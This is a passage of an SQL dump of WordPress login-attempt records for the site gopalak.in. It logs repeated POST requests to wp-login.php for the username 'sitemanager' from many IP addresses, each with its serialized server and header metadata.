";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746017934.4596159;s:12:\"REQUEST_TIME\";i:1746017934;}}','104.219.248.2',0,'2025-04-30 18:28:56','1970-01-01 00:00:00'),(94550,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"15642\";s:11:\"REMOTE_ADDR\";s:15:\"103.161.173.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746018317.502166;s:12:\"REQUEST_TIME\";i:1746018317;}}','103.161.173.219',0,'2025-04-30 18:35:19','1970-01-01 00:00:00'),(94551,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39462\";s:11:\"REMOTE_ADDR\";s:14:\"103.173.227.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746018700.304363;s:12:\"REQUEST_TIME\";i:1746018700;}}','103.173.227.63',0,'2025-04-30 18:41:42','1970-01-01 00:00:00'),(94552,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55586\";s:11:\"REMOTE_ADDR\";s:14:\"103.221.222.85\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746019086.729403;s:12:\"REQUEST_TIME\";i:1746019086;}}','103.221.222.85',0,'2025-04-30 18:48:08','1970-01-01 00:00:00'),(94553,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50848\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.122.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746019473.8866861;s:12:\"REQUEST_TIME\";i:1746019473;}}','68.65.122.143',0,'2025-04-30 18:54:35','1970-01-01 00:00:00'),(94554,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46372\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746019857.296416;s:12:\"REQUEST_TIME\";i:1746019857;}}','103.169.35.190',0,'2025-04-30 19:00:59','1970-01-01 00:00:00'),(94555,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59664\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746020237.518821;s:12:\"REQUEST_TIME\";i:1746020237;}}','103.191.76.181',0,'2025-04-30 19:07:19','1970-01-01 00:00:00'),(94556,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37344\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.128.22\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746020623.237185;s:12:\"REQUEST_TIME\";i:1746020623;}}','66.102.128.22',0,'2025-04-30 19:13:45','1970-01-01 00:00:00'),(94557,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54462\";s:11:\"REMOTE_ADDR\";s:14:\"31.214.174.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746021011.3516359;s:12:\"REQUEST_TIME\";i:1746021011;}}','31.214.174.194',0,'2025-04-30 19:20:13','1970-01-01 00:00:00'),(94558,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43338\";s:11:\"REMOTE_ADDR\";s:12:\"81.88.53.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746021396.604028;s:12:\"REQUEST_TIME\";i:1746021396;}}','81.88.53.143',0,'2025-04-30 19:26:38','1970-01-01 00:00:00'),(94559,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44352\";s:11:\"REMOTE_ADDR\";s:15:\"135.148.137.109\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746021782.0693409;s:12:\"REQUEST_TIME\";i:1746021782;}}','135.148.137.109',0,'2025-04-30 19:33:03','1970-01-01 00:00:00'),(94560,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 